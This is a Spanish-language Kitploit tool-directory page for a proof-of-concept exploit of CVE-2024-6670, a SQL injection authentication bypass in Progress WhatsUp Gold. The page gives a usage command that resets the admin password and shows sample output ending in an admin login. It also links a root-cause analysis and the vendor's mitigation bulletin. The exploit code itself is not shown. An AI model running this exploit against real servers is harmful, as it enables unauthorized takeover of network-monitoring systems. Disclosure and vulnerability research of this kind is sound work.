Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-6670 — Exploit de prueba de concepto para el bypass de autenticación por inyección SQL en Progress WhatsUp Gold (CVE-2024-6670). Incluye análisis de causa raíz y restablecimiento automático de contraseña para obtener acceso de administrador. | Kitploit
Herramientas/GitHubGitHub/sinsinology/cve-2024-6670
Autenticación y AutorizaciónAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubsinsinology/cve-2024-6670

CVE-2024-6670

Exploit de prueba de concepto para el bypass de autenticación por inyección SQL en Progress WhatsUp Gold (CVE-2024-6670). Incluye análisis de causa raíz y restablecimiento automático de contraseña para obtener acceso de administrador.

Ver Repositorio
3551hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-6670

PoC para la vulnerabilidad de inyección SQL y omisión de autenticación HasErrors en Progress Software WhatsUp Gold (CVE-2024-6670)

Se puede encontrar un análisis de causa raíz de la vulnerabilidad en mi blog:

https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/

ZDI

Uso

root@kitploit:~
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/


[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned





Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones del aviso de Progress

  • https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024

Manish Kishan Tanwar

Si no fuera por la motivación y las lecciones que mi querido amigo Manish me ha enseñado durante los años que lo conozco, no habría podido explotar este error, gracias amigo.

Síguenos en Twitter(X) para conocer las últimas investigaciones de seguridad:

  • SinSinology
  • SummoningTeam

Descargo de responsabilidad

Este software ha sido creado puramente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está diseñado para ser utilizado para atacar sistemas excepto cuando se autorice explícitamente. Los mantenedores del proyecto no son responsables del mal uso del software. Úselo de manera responsable.

Descargar herramienta